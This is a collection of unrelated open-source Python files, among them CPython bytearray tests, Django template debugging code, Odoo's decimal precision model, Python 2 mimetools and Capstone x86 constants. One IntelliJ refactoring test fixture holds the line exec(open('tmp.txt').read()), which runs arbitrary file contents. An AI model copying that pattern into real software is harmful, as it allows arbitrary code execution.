self.assertTrue(bytearray.__doc__.startswith("bytearray("), bytearray.__doc__)
self.assertIsNotNone(bytes.__doc__)
self.assertTrue(bytes.__doc__.startswith("bytes("), bytes.__doc__)
def test_from_bytearray(self):
sample = bytes(b"Hello world\n\x80\x81\xfe\xff")
buf = memoryview(sample)
b = bytearray(buf)
self.assertEqual(b, bytearray(sample))
@check_bytes_warnings
def test_to_str(self):
self.assertEqual(str(b''), "b''")
self.assertEqual(str(b'x'), "b'x'")
self.assertEqual(str(b'\x80'), "b'\\x80'")
self.assertEqual(str(bytearray(b'')), "bytearray(b'')")
self.assertEqual(str(bytearray(b'x')), "bytearray(b'x')")
self.assertEqual(str(bytearray(b'\x80')), "bytearray(b'\\x80')")
def test_literal(self):
tests = [
(b"Wonderful spam", "Wonderful spam"),
(br"Wonderful spam too", "Wonderful spam too"),
(b"\xaa\x00\000\200", "\xaa\x00\000\200"),
(br"\xaa\x00\000\200", r"\xaa\x00\000\200"),
]
for b, s in tests:
self.assertEqual(b, bytearray(s, 'latin-1'))
for c in range(128, 256):
self.assertRaises(SyntaxError, eval,
'b"%s"' % chr(c))
def test_translate(self):
b = b'hello'
ba = bytearray(b)
rosetta = bytearray(range(0, 256))
rosetta[ord('o')] = ord('e')
c = b.translate(rosetta, b'l')
self.assertEqual(b, b'hello')
self.assertEqual(c, b'hee')
c = ba.translate(rosetta, b'l')
self.assertEqual(ba, b'hello')
self.assertEqual(c, b'hee')
c = b.translate(None, b'e')
self.assertEqual(c, b'hllo')
c = ba.translate(None, b'e')
self.assertEqual(c, b'hllo')
self.assertRaises(TypeError, b.translate, None, None)
self.assertRaises(TypeError, ba.translate, None, None)
def test_split_bytearray(self):
self.assertEqual(b'a b'.split(memoryview(b' ')), [b'a', b'b'])
def test_rsplit_bytearray(self):
self.assertEqual(b'a b'.rsplit(memoryview(b' ')), [b'a', b'b'])
# Optimizations:
# __iter__? (optimization)
# __reversed__? (optimization)
# XXX More string methods? (Those that don't use character properties)
# There are tests in string_tests.py that are more
# comprehensive for things like split, partition, etc.
# Unfortunately they are all bundled with tests that
# are not appropriate for bytes
# I've started porting some of those into bytearray_tests.py, we should port
# the rest that make sense (the code can be cleaned up to use modern
# unittest methods at the same time).
class BytearrayPEP3137Test(unittest.TestCase,
test.buffer_tests.MixinBytesBufferCommonTests):
def marshal(self, x):
return bytearray(x)
def test_returns_new_copy(self):
val = self.marshal(b'1234')
# On immutable types these MAY return a reference to themselves
# but on mutable types like bytearray they MUST return a new copy.
for methname in ('zfill', 'rjust', 'ljust', 'center'):
method = getattr(val, methname)
newval = method(3)
self.assertEqual(val, newval)
self.assertTrue(val is not newval,
methname+' returned self on a mutable object')
for expr in ('val.split()[0]', 'val.rsplit()[0]',
'val.partition(".")[0]', 'val.rpartition(".")[2]',
'val.splitlines()[0]', 'val.replace("", "")'):
newval = eval(expr)
self.assertEqual(val, newval)
self.assertTrue(val is not newval,
expr+' returned val on a mutable object')
class FixedStringTest(test.string_tests.BaseTest):
def fixtype(self, obj):
if isinstance(obj, str):
return obj.encode("utf-8")
return super(FixedStringTest, self).fixtype(obj)
# Currently the bytes containment testing uses a single integer
# value. This may not be the final design, but until then the
# bytes section with in a bytes containment not valid
def test_contains(self):
pass
def test_expandtabs(self):
pass
def test_upper(self):
pass
def test_lower(self):
pass
def test_hash(self):
# XXX check this out
pass
class ByteArrayAsStringTest(FixedStringTest):
type2test = bytearray
class ByteArraySubclass(bytearray):
pass
class ByteArraySubclassTest(unittest.TestCase):
def test_basic(self):
self.assertTrue(issubclass(ByteArraySubclass, bytearray))
self.assertIsInstance(ByteArraySubclass(), bytearray)
a, b = b"abcd", b"efgh"
_a, _b = ByteArraySubclass(a), ByteArraySubclass(b)
# test comparison operators with subclass instances
self.assertTrue(_a == _a)
self.assertTrue(_a != _b)
self.assertTrue(_a < _b)
self.assertTrue(_a <= _b)
self.assertTrue(_b >= _a)
self.assertTrue(_b > _a)
self.assertTrue(_a is not a)
# test concat of subclass instances
self.assertEqual(a + b, _a + _b)
self.assertEqual(a + b, a + _b)
self.assertEqual(a + b, _a + b)
# test repeat
self.assertTrue(a*5 == _a*5)
def test_join(self):
# Make sure join returns a NEW object for single item sequences
# involving a subclass.
# Make sure that it is of the appropriate type.
s1 = ByteArraySubclass(b"abcd")
s2 = bytearray().join([s1])
self.assertTrue(s1 is not s2)
self.assertTrue(type(s2) is bytearray, type(s2))
# Test reverse, calling join on subclass
s3 = s1.join([b"abcd"])
self.assertTrue(type(s3) is bytearray)
def test_pickle(self):
a = ByteArraySubclass(b"abcd")
a.x = 10
a.y = ByteArraySubclass(b"efgh")
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
b = pickle.loads(pickle.dumps(a, proto))
self.assertNotEqual(id(a), id(b))
self.assertEqual(a, b)
self.assertEqual(a.x, b.x)
self.assertEqual(a.y, b.y)
self.assertEqual(type(a), type(b))
self.assertEqual(type(a.y), type(b.y))
def test_copy(self):
a = ByteArraySubclass(b"abcd")
a.x = 10
a.y = ByteArraySubclass(b"efgh")
for copy_method in (copy.copy, copy.deepcopy):
b = copy_method(a)
self.assertNotEqual(id(a), id(b))
self.assertEqual(a, b)
self.assertEqual(a.x, b.x)
self.assertEqual(a.y, b.y)
self.assertEqual(type(a), type(b))
self.assertEqual(type(a.y), type(b.y))
def test_init_override(self):
class subclass(bytearray):
def __init__(self, newarg=1, *args, **kwargs):
bytearray.__init__(self, *args, **kwargs)
x = subclass(4, source=b"abcd")
self.assertEqual(x, b"abcd")
x = subclass(newarg=4, source=b"abcd")
self.assertEqual(x, b"abcd")
def test_main():
#test.test_support.run_unittest(BytesTest)
#test.test_support.run_unittest(AssortedBytesTest)
#test.test_support.run_unittest(BytesAsStringTest)
test.test_support.run_unittest(
ByteArrayTest,
ByteArrayAsStringTest,
ByteArraySubclassTest,
BytearrayPEP3137Test)
if __name__ == "__main__":
test_main()
|
openhatch/new-mini-tasks
|
refs/heads/master
|
vendor/packages/Django/django/template/debug.py
|
110
|
from django.template.base import Lexer, Parser, tag_re, NodeList, VariableNode, TemplateSyntaxError
from django.utils.encoding import force_text
from django.utils.html import escape
from django.utils.safestring import SafeData, EscapeData
from django.utils.formats import localize
from django.utils.timezone import template_localtime
class DebugLexer(Lexer):
def __init__(self, template_string, origin):
super(DebugLexer, self).__init__(template_string, origin)
def tokenize(self):
"Return a list of tokens from a given template_string"
result, upto = [], 0
for match in tag_re.finditer(self.template_string):
start, end = match.span()
if start > upto:
result.append(self.create_token(self.template_string[upto:start], (upto, start), False))
upto = start
result.append(self.create_token(self.template_string[start:end], (start, end), True))
upto = end
last_bit = self.template_string[upto:]
if last_bit:
result.append(self.create_token(last_bit, (upto, upto + len(last_bit)), False))
return result
def create_token(self, token_string, source, in_tag):
token = super(DebugLexer, self).create_token(token_string, in_tag)
token.source = self.origin, source
return token
class DebugParser(Parser):
def __init__(self, lexer):
super(DebugParser, self).__init__(lexer)
self.command_stack = []
def enter_command(self, command, token):
self.command_stack.append( (command, token.source) )
def exit_command(self):
self.command_stack.pop()
def error(self, token, msg):
return self.source_error(token.source, msg)
def source_error(self, source, msg):
e = TemplateSyntaxError(msg)
e.django_template_source = source
return e
def create_nodelist(self):
return DebugNodeList()
def create_variable_node(self, contents):
return DebugVariableNode(contents)
def extend_nodelist(self, nodelist, node, token):
node.source = token.source
super(DebugParser, self).extend_nodelist(nodelist, node, token)
def unclosed_block_tag(self, parse_until):
command, source = self.command_stack.pop()
msg = "Unclosed tag '%s'. Looking for one of: %s " % (command, ', '.join(parse_until))
raise self.source_error(source, msg)
def compile_function_error(self, token, e):
if not hasattr(e, 'django_template_source'):
e.django_template_source = token.source
class DebugNodeList(NodeList):
def render_node(self, node, context):
try:
return node.render(context)
except Exception as e:
if not hasattr(e, 'django_template_source'):
e.django_template_source = node.source
raise
class DebugVariableNode(VariableNode):
def render(self, context):
try:
output = self.filter_expression.resolve(context)
output = template_localtime(output, use_tz=context.use_tz)
output = localize(output, use_l10n=context.use_l10n)
output = force_text(output)
except UnicodeDecodeError:
return ''
except Exception as e:
if not hasattr(e, 'django_template_source'):
e.django_template_source = self.source
raise
if (context.autoescape and not isinstance(output, SafeData)) or isinstance(output, EscapeData):
return escape(output)
else:
return output
|
youdonghai/intellij-community
|
refs/heads/master
|
python/testData/refactoring/introduceConstant/py1840EntireLine.py
|
83
|
<selection>exec(open("tmp.txt").read())</selection>
|
tmkasun/Knnect
|
refs/heads/master
|
server_core/repo/core/event_porcessor.py
|
1
|
class IEventProcessor(object):
def __init__(self):
pass
def data_in(self, geojson):
raise NotImplementedError("Subclass need to implement this method")
def data_out(self, geojson):
raise NotImplementedError("Subclass need to implement this method")
|
coillarach/PCWG
|
refs/heads/master
|
uncertainty.py
|
5
|
import pandas as pd
import numpy as np
import datetime
import math
import binning
class Config:
def __init__(self):
self.inputTimeSeriesPath = "test.dat"
self.timeStamp = "Date & Time Stamp"
self.actualPower = "Power"
self.inputHubWindSpeed = "WindSpeed"
self.dateFormat = "%d/%m/%y %H:%M"
self.headerRows = 0
self.badData = -99.99
self.ratedPower = 2000.0
class CategoryBAnemometerOrSonicUncertainty:
def __init__(self, windSpeed, mounting_applied, alternativeMounting_applied, sideMounted_applied, lightningFinal_applied):
self.calibration = 0.05 #From E.20
self.postCalibration = 0.05 #From E.20
self.totalCalibration = math.sqrt(self.calibration ** 2.0 + self.postCalibration ** 2.0) #From E.20
self.classUncertainty = (0.05 + 0.005 * windSpeed) * 1.2 / math.sqrt(3.0) #From E.21
if mounting_applied:
self.mounting = 0.01 * windSpeed #From E.19
else:
self.mounting = 0.0
if alternativeMounting_applied:
self.alternativeMounting = 0.015 * windSpeed #From E.19
else:
self.alternativeMounting = 0.0
if sideMounted_applied:
self.sideMounted = 0.015 * windSpeed #From E.19
else:
self.sideMounted = 0.0
if lightningFinal_applied:
self.lightningFinal = 0.01 * windSpeed #From E.19
else:
self.lightningFinal = 0.0
self.DAQ = 30.0 * 0.1 #From E.19
self.totalWindSpeedUncertainty = math.sqrt(self.totalCalibration ** 2.0
+ self.classUncertainty ** 2.0
+ self.mounting ** 2.0
+ self.alternativeMounting ** 2.0
+ self.sideMounted ** 2.0
+ self.lightningFinal ** 2.0
+ self.DAQ ** 2.0)
self.sensitivityFactor = 99.0 #todo from From E.31
self.totalCategoryBUncertainty = self.totalWindSpeedUncertainty * self.sensitivityFactor
class CategoryBPowerUncertainty:
def __init__(self, power, uPdyn_Applied, uPVT_Applied):
if uPdyn_Applied:
self.uPdyn = 0.001 * power #From E.14
else:
self.uPdyn = 0.0
self.udP = (1.25-(-0.25)) * 0.0010 * power #From E.14
self.uPCT = 0.0075 * abs(power) / math.sqrt(3) #From E.15
if uPVT_Applied:
self.uPVT = 0.0050 * abs(power)/ math.sqrt(3.0) #From E.16
else:
self.uPVT = 0.0
self.uPPT = config.ratedPower * 1.50 * 0.0050 / math.sqrt(3) #From E.17
self.totalCategoryBUncertainty = math.sqrt(self.uPdyn ** 2.0 + self.udP ** 2.0 + self.uPCT ** 2.0 + self.uPVT ** 2.0 + self.uPPT ** 2.0)
class Analysis:
def __init__(self, config):
dateConverter = lambda x: datetime.datetime.strptime(x, config.dateFormat)
self.windSpeedBin = "WindSpeedBin"
self.windSpeedBins = binning.Bins(1.0, 1, 30.0)
self.aggregations = binning.Aggregations(minimumCount=1)
dataFrame = pd.read_csv(config.inputTimeSeriesPath, index_col=config.timeStamp, parse_dates = True, date_parser = dateConverter, sep = '\t', skiprows = config.headerRows).replace(config.badData, np.nan)
dataFrame[self.windSpeedBin] = dataFrame[config.inputHubWindSpeed].map(self.windSpeedBins.binCenter)
powers = dataFrame[config.actualPower].groupby(dataFrame[self.windSpeedBin]).aggregate(self.aggregations.average)
stdErrorPowers = dataFrame[config.actualPower].groupby(dataFrame[self.windSpeedBin]).aggregate(self.aggregations.standardError)
catBPowerUncertainty = {}
uPdyn_Applied = True
uPVT_Applied = True
catBPowerUncertainty = {}
for windSpeed in self.windSpeedBins.centers:
if windSpeed in powers:
power = powers[windSpeed]
catBPowerUncertainty[windSpeed] = CategoryBPowerUncertainty(power, uPdyn_Applied = uPdyn_Applied, uPVT_Applied = uPVT_Applied)
print catBPowerUncertainty[windSpeed].catBPowerUncertainty
config = Config()
analysis = Analysis(config)
|
bwrsandman/OpenUpgrade
|
refs/heads/8.0
|
addons/decimal_precision/decimal_precision.py
|
233
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import orm, fields
from openerp.modules.registry import RegistryManager
class decimal_precision(orm.Model):
_name = 'decimal.precision'
_columns = {
'name': fields.char('Usage', select=True, required=True),
'digits': fields.integer('Digits', required=True),
}
_defaults = {
'digits': 2,
}
_sql_constraints = [
('name_uniq', 'unique (name)', """Only one value can be defined for each given usage!"""),
]
@tools.ormcache(skiparg=3)
def precision_get(self, cr, uid, application):
cr.execute('select digits from decimal_precision where name=%s', (application,))
res = cr.fetchone()
return res[0] if res else 2
def clear_cache(self, cr):
"""clear cache and update models. Notify other workers to restart their registry."""
self.precision_get.clear_cache(self)
RegistryManager.signal_registry_change(cr.dbname)
def create(self, cr, uid, data, context=None):
res = super(decimal_precision, self).create(cr, uid, data, context=context)
self.clear_cache(cr)
return res
def unlink(self, cr, uid, ids, context=None):
res = super(decimal_precision, self).unlink(cr, uid, ids, context=context)
self.clear_cache(cr)
return res
def write(self, cr, uid, ids, data, *args, **argv):
res = super(decimal_precision, self).write(cr, uid, ids, data, *args, **argv)
self.clear_cache(cr)
return res
def get_precision(application):
def change_digit(cr):
decimal_precision = openerp.registry(cr.dbname)['decimal.precision']
res = decimal_precision.precision_get(cr, SUPERUSER_ID, application)
return (16, res)
return change_digit
class DecimalPrecisionFloat(orm.AbstractModel):
""" Override qweb.field.float to add a `decimal_precision` domain option
and use that instead of the column's own value if it is specified
"""
_inherit = 'ir.qweb.field.float'
def precision(self, cr, uid, field, options=None, context=None):
dp = options and options.get('decimal_precision')
if dp:
return self.pool['decimal.precision'].precision_get(
cr, uid, dp)
return super(DecimalPrecisionFloat, self).precision(
cr, uid, field, options=options, context=context)
class DecimalPrecisionTestModel(orm.Model):
_name = 'decimal.precision.test'
_columns = {
'float': fields.float(),
'float_2': fields.float(digits=(16, 2)),
'float_4': fields.float(digits=(16, 4)),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
flwh/KK_mt6589_iq451
|
refs/heads/master
|
prebuilts/python/linux-x86/2.7.5/lib/python2.7/mimetools.py
|
334
|
"""Various tools used by MIME-reading or MIME-writing programs."""
import os
import sys
import tempfile
from warnings import filterwarnings, catch_warnings
with catch_warnings():
if sys.py3kwarning:
filterwarnings("ignore", ".*rfc822 has been removed", DeprecationWarning)
import rfc822
from warnings import warnpy3k
warnpy3k("in 3.x, mimetools has been removed in favor of the email package",
stacklevel=2)
__all__ = ["Message","choose_boundary","encode","decode","copyliteral",
"copybinary"]
class Message(rfc822.Message):
"""A derived class of rfc822.Message that knows about MIME headers and
contains some hooks for decoding encoded and multipart messages."""
def __init__(self, fp, seekable = 1):
rfc822.Message.__init__(self, fp, seekable)
self.encodingheader = \
self.getheader('content-transfer-encoding')
self.typeheader = \
self.getheader('content-type')
self.parsetype()
self.parseplist()
def parsetype(self):
str = self.typeheader
if str is None:
str = 'text/plain'
if ';' in str:
i = str.index(';')
self.plisttext = str[i:]
str = str[:i]
else:
self.plisttext = ''
fields = str.split('/')
for i in range(len(fields)):
fields[i] = fields[i].strip().lower()
self.type = '/'.join(fields)
self.maintype = fields[0]
self.subtype = '/'.join(fields[1:])
def parseplist(self):
str = self.plisttext
self.plist = []
while str[:1] == ';':
str = str[1:]
if ';' in str:
# XXX Should parse quotes!
end = str.index(';')
else:
end = len(str)
f = str[:end]
if '=' in f:
i = f.index('=')
f = f[:i].strip().lower() + \
'=' + f[i+1:].strip()
self.plist.append(f.strip())
str = str[end:]
def getplist(self):
return self.plist
def getparam(self, name):
name = name.lower() + '='
n = len(name)
for p in self.plist:
if p[:n] == name:
return rfc822.unquote(p[n:])
return None
def getparamnames(self):
result = []
for p in self.plist:
i = p.find('=')
if i >= 0:
result.append(p[:i].lower())
return result
def getencoding(self):
if self.encodingheader is None:
return '7bit'
return self.encodingheader.lower()
def gettype(self):
return self.type
def getmaintype(self):
return self.maintype
def getsubtype(self):
return self.subtype
# Utility functions
# -----------------
try:
import thread
except ImportError:
import dummy_thread as thread
_counter_lock = thread.allocate_lock()
del thread
_counter = 0
def _get_next_counter():
global _counter
_counter_lock.acquire()
_counter += 1
result = _counter
_counter_lock.release()
return result
_prefix = None
def choose_boundary():
"""Return a string usable as a multipart boundary.
The string chosen is unique within a single program run, and
incorporates the user id (if available), process id (if available),
and current time. So it's very unlikely the returned string appears
in message text, but there's no guarantee.
The boundary contains dots so you have to quote it in the header."""
global _prefix
import time
if _prefix is None:
import socket
try:
hostid = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
hostid = '127.0.0.1'
try:
uid = repr(os.getuid())
except AttributeError:
uid = '1'
try:
pid = repr(os.getpid())
except AttributeError:
pid = '1'
_prefix = hostid + '.' + uid + '.' + pid
return "%s.%.3f.%d" % (_prefix, time.time(), _get_next_counter())
# Subroutines for decoding some common content-transfer-types
def decode(input, output, encoding):
"""Decode common content-transfer-encodings (base64, quopri, uuencode)."""
if encoding == 'base64':
import base64
return base64.decode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.decode(input, output)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.decode(input, output)
if encoding in ('7bit', '8bit'):
return output.write(input.read())
if encoding in decodetab:
pipethrough(input, decodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
def encode(input, output, encoding):
"""Encode common content-transfer-encodings (base64, quopri, uuencode)."""
if encoding == 'base64':
import base64
return base64.encode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.encode(input, output, 0)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.encode(input, output)
if encoding in ('7bit', '8bit'):
return output.write(input.read())
if encoding in encodetab:
pipethrough(input, encodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
# The following is no longer used for standard encodings
# XXX This requires that uudecode and mmencode are in $PATH
uudecode_pipe = '''(
TEMP=/tmp/@uu.$$
sed "s%^begin [0-7][0-7]* .*%begin 600 $TEMP%" | uudecode
cat $TEMP
rm $TEMP
)'''
decodetab = {
'uuencode': uudecode_pipe,
'x-uuencode': uudecode_pipe,
'uue': uudecode_pipe,
'x-uue': uudecode_pipe,
'quoted-printable': 'mmencode -u -q',
'base64': 'mmencode -u -b',
}
encodetab = {
'x-uuencode': 'uuencode tempfile',
'uuencode': 'uuencode tempfile',
'x-uue': 'uuencode tempfile',
'uue': 'uuencode tempfile',
'quoted-printable': 'mmencode -q',
'base64': 'mmencode -b',
}
def pipeto(input, command):
pipe = os.popen(command, 'w')
copyliteral(input, pipe)
pipe.close()
def pipethrough(input, command, output):
(fd, tempname) = tempfile.mkstemp()
temp = os.fdopen(fd, 'w')
copyliteral(input, temp)
temp.close()
pipe = os.popen(command + ' <' + tempname, 'r')
copybinary(pipe, output)
pipe.close()
os.unlink(tempname)
def copyliteral(input, output):
while 1:
line = input.readline()
if not line: break
output.write(line)
def copybinary(input, output):
BUFSIZE = 8192
while 1:
line = input.read(BUFSIZE)
if not line: break
output.write(line)
|
techvoltage/capstone
|
refs/heads/master
|
bindings/python/capstone/x86_const.py
|
33
|
# For Capstone Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.py]
# X86 registers
X86_REG_INVALID = 0
X86_REG_AH = 1
X86_REG_AL = 2
X86_REG_AX = 3
X86_REG_BH = 4
X86_REG_BL = 5
X86_REG_BP = 6
X86_REG_BPL = 7
X86_REG_BX = 8
X86_REG_CH = 9
X86_REG_CL = 10
X86_REG_CS = 11
X86_REG_CX = 12
X86_REG_DH = 13
X86_REG_DI = 14
X86_REG_DIL = 15
X86_REG_DL = 16
X86_REG_DS = 17
X86_REG_DX = 18
X86_REG_EAX = 19
X86_REG_EBP = 20
X86_REG_EBX = 21
X86_REG_ECX = 22
X86_REG_EDI = 23
X86_REG_EDX = 24
X86_REG_EFLAGS = 25
X86_REG_EIP = 26
X86_REG_EIZ = 27
X86_REG_ES = 28
X86_REG_ESI = 29
X86_REG_ESP = 30
X86_REG_FPSW = 31
X86_REG_FS = 32
X86_REG_GS = 33
X86_REG_IP = 34
X86_REG_RAX = 35
X86_REG_RBP = 36
X86_REG_RBX = 37
X86_REG_RCX = 38
X86_REG_RDI = 39
X86_REG_RDX = 40
X86_REG_RIP = 41
X86_REG_RIZ = 42
X86_REG_RSI = 43
X86_REG_RSP = 44
X86_REG_SI = 45
X86_REG_SIL = 46
X86_REG_SP = 47
X86_REG_SPL = 48
X86_REG_SS = 49
X86_REG_CR0 = 50
X86_REG_CR1 = 51
X86_REG_CR2 = 52
X86_REG_CR3 = 53
X86_REG_CR4 = 54
X86_REG_CR5 = 55
X86_REG_CR6 = 56
X86_REG_CR7 = 57
X86_REG_CR8 = 58
X86_REG_CR9 = 59
X86_REG_CR10 = 60
X86_REG_CR11 = 61
X86_REG_CR12 = 62
X86_REG_CR13 = 63
X86_REG_CR14 = 64
X86_REG_CR15 = 65
X86_REG_DR0 = 66
X86_REG_DR1 = 67
X86_REG_DR2 = 68
X86_REG_DR3 = 69
X86_REG_DR4 = 70
X86_REG_DR5 = 71
X86_REG_DR6 = 72
X86_REG_DR7 = 73
X86_REG_FP0 = 74
X86_REG_FP1 = 75
X86_REG_FP2 = 76
X86_REG_FP3 = 77
X86_REG_FP4 = 78
X86_REG_FP5 = 79
X86_REG_FP6 = 80
X86_REG_FP7 = 81
X86_REG_K0 = 82
X86_REG_K1 = 83
X86_REG_K2 = 84
X86_REG_K3 = 85
X86_REG_K4 = 86
X86_REG_K5 = 87
X86_REG_K6 = 88
X86_REG_K7 = 89
X86_REG_MM0 = 90
X86_REG_MM1 = 91
X86_REG_MM2 = 92
X86_REG_MM3 = 93
X86_REG_MM4 = 94
X86_REG_MM5 = 95
X86_REG_MM6 = 96
X86_REG_MM7 = 97
X86_REG_R8 = 98
X86_REG_R9 = 99
X86_REG_R10 = 100
X86_REG_R11 = 101
X86_REG_R12 = 102
X86_REG_R13 = 103
X86_REG_R14 = 104
X86_REG_R15 = 105
X86_REG_ST0 = 106
X86_REG_ST1 = 107
X86_REG_ST2 = 108
X86_REG_ST3 = 109
X86_REG_ST4 = 110
X86_REG_ST5 = 111
X86_REG_ST6 = 112
X86_REG_ST7 = 113
X86_REG_XMM0 = 114
X86_REG_XMM1 = 115
X86_REG_XMM2 = 116
X86_REG_XMM3 = 117
X86_REG_XMM4 = 118
X86_REG_XMM5 = 119
X86_REG_XMM6 = 120
X86_REG_XMM7 = 121
X86_REG_XMM8 = 122
X86_REG_XMM9 = 123
X86_REG_XMM10 = 124
X86_REG_XMM11 = 125
X86_REG_XMM12 = 126
X86_REG_XMM13 = 127
X86_REG_XMM14 = 128
X86_REG_XMM15 = 129
X86_REG_XMM16 = 130
X86_REG_XMM17 = 131
X86_REG_XMM18 = 132
X86_REG_XMM19 = 133
X86_REG_XMM20 = 134
X86_REG_XMM21 = 135
X86_REG_XMM22 = 136
X86_REG_XMM23 = 137
X86_REG_XMM24 = 138
X86_REG_XMM25 = 139
X86_REG_XMM26 = 140
X86_REG_XMM27 = 141
X86_REG_XMM28 = 142
X86_REG_XMM29 = 143
X86_REG_XMM30 = 144
X86_REG_XMM31 = 145
X86_REG_YMM0 = 146
X86_REG_YMM1 = 147
X86_REG_YMM2 = 148
X86_REG_YMM3 = 149
X86_REG_YMM4 = 150
X86_REG_YMM5 = 151
X86_REG_YMM6 = 152
X86_REG_YMM7 = 153
X86_REG_YMM8 = 154
X86_REG_YMM9 = 155
X86_REG_YMM10 = 156
X86_REG_YMM11 = 157
X86_REG_YMM12 = 158
X86_REG_YMM13 = 159
X86_REG_YMM14 = 160
X86_REG_YMM15 = 161
X86_REG_YMM16 = 162
X86_REG_YMM17 = 163
X86_REG_YMM18 = 164
X86_REG_YMM19 = 165
X86_REG_YMM20 = 166
X86_REG_YMM21 = 167
X86_REG_YMM22 = 168
X86_REG_YMM23 = 169
X86_REG_YMM24 = 170
X86_REG_YMM25 = 171
X86_REG_YMM26 = 172
X86_REG_YMM27 = 173
X86_REG_YMM28 = 174
X86_REG_YMM29 = 175
X86_REG_YMM30 = 176
X86_REG_YMM31 = 177
X86_REG_ZMM0 = 178
X86_REG_ZMM1 = 179
X86_REG_ZMM2 = 180
X86_REG_ZMM3 = 181
X86_REG_ZMM4 = 182
X86_REG_ZMM5 = 183
X86_REG_ZMM6 = 184
X86_REG_ZMM7 = 185
X86_REG_ZMM8 = 186
X86_REG_ZMM9 = 187
X86_REG_ZMM10 = 188
X86_REG_ZMM11 = 189
X86_REG_ZMM12 = 190
X86_REG_ZMM13 = 191
X86_REG_ZMM14 = 192
X86_REG_ZMM15 = 193
X86_REG_ZMM16 = 194
X86_REG_ZMM17 = 195
X86_REG_ZMM18 = 196
X86_REG_ZMM19 = 197
X86_REG_ZMM20 = 198
X86_REG_ZMM21 = 199
X86_REG_ZMM22 = 200
X86_REG_ZMM23 = 201
X86_REG_ZMM24 = 202
X86_REG_ZMM25 = 203
X86_REG_ZMM26 = 204
X86_REG_ZMM27 = 205
X86_REG_ZMM28 = 206
X86_REG_ZMM29 = 207
X86_REG_ZMM30 = 208
X86_REG_ZMM31 = 209
X86_REG_R8B = 210
X86_REG_R9B = 211
X86_REG_R10B = 212
X86_REG_R11B = 213
X86_REG_R12B = 214
X86_REG_R13B = 215
X86_REG_R14B = 216
X86_REG_R15B = 217
X86_REG_R8D = 218
X86_REG_R9D = 219
X86_REG_R10D = 220
X86_REG_R11D = 221
X86_REG_R12D = 222
X86_REG_R13D = 223
X86_REG_R14D = 224
X86_REG_R15D = 225
X86_REG_R8W = 226
X86_REG_R9W = 227
X86_REG_R10W = 228
X86_REG_R11W = 229
X86_REG_R12W = 230
X86_REG_R13W = 231
X86_REG_R14W = 232
X86_REG_R15W = 233
X86_REG_ENDING = 234
# Operand type for instruction's operands
X86_OP_INVALID = 0
X86_OP_REG = 1
X86_OP_IMM = 2
X86_OP_MEM = 3
X86_OP_FP = 4
# AVX broadcast type
X86_AVX_BCAST_INVALID = 0
X86_AVX_BCAST_2 = 1
X86_AVX_BCAST_4 = 2
X86_AVX_BCAST_8 = 3
X86_AVX_BCAST_16 = 4
# SSE Code Condition type
X86_SSE_CC_INVALID = 0
X86_SSE_CC_EQ = 1
X86_SSE_CC_LT = 2
X86_SSE_CC_LE = 3
X86_SSE_CC_UNORD = 4
X86_SSE_CC_NEQ = 5
X86_SSE_CC_NLT = 6
X86_SSE_CC_NLE = 7
X86_SSE_CC_ORD = 8
X86_SSE_CC_EQ_UQ = 9
X86_SSE_CC_NGE = 10
X86_SSE_CC_NGT = 11
X86_SSE_CC_FALSE = 12
X86_SSE_CC_NEQ_OQ = 13
X86_SSE_CC_GE = 14
X86_SSE_CC_GT = 15
X86_SSE_CC_TRUE = 16
# AVX Code Condition type
X86_AVX_CC_INVALID = 0
X86_AVX_CC_EQ = 1
X86_AVX_CC_LT = 2
X86_AVX_CC_LE = 3
X86_AVX_CC_UNORD = 4
X86_AVX_CC_NEQ = 5
X86_AVX_CC_NLT = 6
X86_AVX_CC_NLE = 7
X86_AVX_CC_ORD = 8
X86_AVX_CC_EQ_UQ = 9
X86_AVX_CC_NGE = 10
X86_AVX_CC_NGT = 11
X86_AVX_CC_FALSE = 12
X86_AVX_CC_NEQ_OQ = 13
X86_AVX_CC_GE = 14
X86_AVX_CC_GT = 15
X86_AVX_CC_TRUE = 16
X86_AVX_CC_EQ_OS = 17
X86_AVX_CC_LT_OQ = 18
X86_AVX_CC_LE_OQ = 19
X86_AVX_CC_UNORD_S = 20
X86_AVX_CC_NEQ_US = 21
X86_AVX_CC_NLT_UQ = 22
X86_AVX_CC_NLE_UQ = 23
X86_AVX_CC_ORD_S = 24
X86_AVX_CC_EQ_US = 25
X86_AVX_CC_NGE_UQ = 26
X86_AVX_CC_NGT_UQ = 27
X86_AVX_CC_FALSE_OS = 28
X86_AVX_CC_NEQ_OS = 29
X86_AVX_CC_GE_OQ = 30
X86_AVX_CC_GT_OQ = 31
X86_AVX_CC_TRUE_US = 32
# AVX static rounding mode type
X86_AVX_RM_INVALID = 0
X86_AVX_RM_RN = 1
X86_AVX_RM_RD = 2
X86_AVX_RM_RU = 3
X86_AVX_RM_RZ = 4
# Instruction prefixes - to be used in cs_x86.prefix[]
X86_PREFIX_LOCK = 0xf0
X86_PREFIX_REP = 0xf3
X86_PREFIX_REPNE = 0xf2
X86_PREFIX_CS = 0x2e
X86_PREFIX_SS = 0x36
X86_PREFIX_DS = 0x3e
X86_PREFIX_ES = 0x26
X86_PREFIX_FS = 0x64
X86_PREFIX_GS = 0x65
X86_PREFIX_OPSIZE = 0x66
